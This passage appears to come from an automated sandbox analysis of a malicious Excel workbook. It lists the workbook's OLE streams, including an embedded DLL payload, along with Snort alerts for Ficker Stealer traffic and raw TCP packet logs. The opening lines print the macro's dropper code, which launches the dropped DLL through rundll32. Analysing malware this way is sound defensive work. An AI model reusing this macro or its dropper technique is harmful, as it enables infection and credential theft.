                                                
                                                Call nam(Ioes)
                                                
                                                Dim ued As String
                                                ued = ".exe"
                                                
                                                
                                                 fffz 0, vbNullString,     "rundl" & "l32", Environ$("temp") & "\omsh.dll,SHIIJGLGNAB",      vbNullString, 1
                                                End If
                                                End If
                                                End Sub
                                                
                                                
                                                Sub xxx()
                                                Dim usx
                                                
                                                usx = Environ$("temp")
                                                
                                                
                                                Dim asdaf As FileSystemObject
                                                
                                                Set asdaf = New Scripting.FileSystemObject
                                                
                                                
                                                Call Search(asdaf.GetFolder(usx), Ioes)
                                                
                                                End Sub

                                                Streams

                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 107
                                                General
                                                Stream Path:\x1CompObj
                                                File Type:data
                                                Stream Size:107
                                                Entropy:4.18482950044
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                General
                                                Stream Path:\x5DocumentSummaryInformation
                                                File Type:data
                                                Stream Size:244
                                                Entropy:2.65175227267
                                                Base64 Encoded:False
                                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 176
                                                General
                                                Stream Path:\x5SummaryInformation
                                                File Type:data
                                                Stream Size:176
                                                Entropy:2.70609321129
                                                Base64 Encoded:False
                                                Stream Path: MBD0132A5F4/\x1CompObj, File Type: data, Stream Size: 76
                                                General
                                                Stream Path:MBD0132A5F4/\x1CompObj
                                                File Type:data
                                                Stream Size:76
                                                Entropy:3.09344952647
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . O L E P a c k a g e . . . . . . . . . P a c k a g e . . 9 . q . . . . . . . . . . . .
                                                Stream Path: MBD0132A5F4/\x1Ole10Native, File Type: data, Stream Size: 205073
                                                General
                                                Stream Path:MBD0132A5F4/\x1Ole10Native
                                                File Type:data
                                                Stream Size:205073
                                                Entropy:6.32670240332
                                                Base64 Encoded:True
                                                Data ASCII:. ! . . . . 5 3 2 . d l l . C : \\ U s e r s \\ M y P c \\ D e s k t o p \\ 2 1 3 \\ 5 3 2 . d l l . . . . . ) . . . C : \\ U s e r s \\ M y P c \\ A p p D a t a \\ L o c a l \\ T e m p \\ 5 3 2 . d l l . . . . M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . ` . . A $ . . . $ . . . $ . . . . U . . 0 . . . . U .
                                                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 117790
                                                Entropy:7.68434203092
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @
                                                Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 463
                                                Entropy:5.37464134487
                                                Base64 Encoded:True
                                                Data ASCII:I D = " { 5 9 C 6 5 7 D 9 - A 6 8 9 - 4 0 B 8 - 8 8 7 C - D 5 C B C A E 8 8 A 1 C } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 0 A 2 B 8 B E B C B E B C B E B C B E B C " . . D P B = " 7 9 7 B 6 1 9 2 6 2 9 2 6 2 9 2 " . . G C = " 5 2 5 0
                                                Data Raw:49 44 3d 22 7b 35 39 43 36 35 37 44 39 2d 41 36 38 39 2d 34 30 42 38 2d 38 38 37 43 2d 44 35 43 42 43 41 45 38 38 41 31 43 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d
                                                Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 86
                                                Entropy:3.24455457963
                                                Base64 Encoded:False
                                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . S h e e t 1 . S . h . e . e . t . 1 . . . . .
                                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 00 00
                                                Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3274
                                                Entropy:4.47186467068
                                                Base64 Encoded:False
                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 3034
                                                Entropy:3.312414071
                                                Base64 Encoded:False
                                                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ , . . . . . . . . . . . . . . . " . . . . . . . . . . .
                                                Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 381
                                                Entropy:2.66347860718
                                                Base64 Encoded:False
                                                Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h w n d . . . . . . . . . . . . . . . . l p O p e r a t i o n . . . . . . . . . . . . . . . . l p F i l e . . . . . . . . .
                                                Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 11 00 00 00 00 00 00 00 00 00 05 00 ff ff
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 2014
                                                Entropy:3.03300546518
                                                Base64 Encoded:False
                                                Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . a . . . . . . . . . . . . . . . . .
                                                Data Raw:72 55 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 03 00 02 00 17 00 00 00 f1 0e 00 00 00 00 00 00 00 00 00 00 81 11 00 00 00 00 00 00 00 00 00 00 71 13 00 00 00 00 00 00 00 00
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 342
                                                Entropy:2.15826376963
                                                Base64 Encoded:False
                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . 8 . . . . . . . . . . . . . . .
                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 80 00 00 00 08 00 78 00 b1 0a 00 00 00 00 00 00 00 00 00 00 00 00 03 70 18 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_4, File Type: data, Stream Size: 367
                                                Entropy:1.33311181947
                                                Base64 Encoded:False
                                                Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . . . . . . i . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 05 00 10 00 00 00 00 00 00 00 00 00 04 00 02 00 02 00 00 00 00 00 48 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 69 02
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_5, File Type: data, Stream Size: 248
                                                Entropy:1.88677350926
                                                Base64 Encoded:False
                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . P . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . P . . . . . . . b . . . . . . . . . . . . . . .
                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 40 00 f1 00 00 00 00 00 00 00 00 00 04 00 00 00 00 60 04 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 685
                                                Entropy:6.38472401563
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                Data Raw:01 a9 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 e2 f1 ef 62 07 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                Network Behavior

                                                Snort IDS Alerts

                                                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                07/22/21-16:11:06.655970 | TCP | 2031074 | ET TROJAN Win32/Ficker Stealer Activity | 80 | 49173 | 95.213.179.67 | 192.168.2.22
                                                07/22/21-16:11:06.656427 | TCP | 2031132 | ET TROJAN Win32/Ficker Stealer Activity M3 | 49173 | 80 | 192.168.2.22 | 95.213.179.67
                                                07/22/21-16:11:08.151878 | TCP | 2031074 | ET TROJAN Win32/Ficker Stealer Activity | 80 | 49178 | 95.213.179.67 | 192.168.2.22
                                                07/22/21-16:11:08.152290 | TCP | 2031132 | ET TROJAN Win32/Ficker Stealer Activity M3 | 49178 | 80 | 192.168.2.22 | 95.213.179.67

                                                Network Port Distribution

                                                TCP Packets

                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Jul 22, 2021 16:11:04.729257107 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.729269028 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.729304075 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.729309082 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.729345083 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.729346037 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.729378939 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.729383945 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.729418993 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.729423046 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.729458094 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.729463100 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.729501963 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783242941 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783276081 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783298016 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783318996 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783344030 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783365965 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783369064 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783385992 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783386946 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783396959 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783409119 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783416033 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783432007 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783438921 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783454895 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783463001 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783476114 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783483028 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783497095 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783505917 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783523083 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783525944 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783545971 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783552885 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783566952 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783574104 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783588886 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783597946 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783611059 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783704042 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784159899 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784185886 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784204006 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784220934 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784240007 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784241915 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784261942 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784261942 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784276009 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784282923 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784292936 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784302950 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784316063 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784322977 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784328938 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784346104 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784356117 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784368038 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784375906 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784389019 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784400940 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784410000 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784416914 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784430981 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784446001 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784452915 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784466028 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784473896 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784481049 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784495115 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784506083 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784518003 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784526110 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784533978 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784540892 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784554958 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784559965 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784564972 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784578085 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784580946 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784590960 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784603119 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784614086 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784622908 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784636021 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784643888 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784650087 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784663916 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784677029 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784687996 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784692049 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784709930 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784720898 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784729958 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784750938 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784751892 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784759998 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784771919 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784787893 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784800053 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784813881 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784830093 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784832954 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784852028 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784869909 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784881115 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838396072 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838438034 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838476896 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838510990 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838541031 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838571072 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838579893 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838601112 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838612080 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838629961 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838641882 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838660002 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838669062 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838690042 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838691950 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838726997 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838728905 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838761091 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838777065 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838783979 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838790894 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838809967 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838820934 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838829041 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838877916 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839462996 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839498043 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839529991 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839553118 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839562893 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839587927 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839590073 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839616060 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839623928 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839638948 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839653015 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839663029 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839683056 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839683056 CEST4916980192.168.2.228.211.241.0
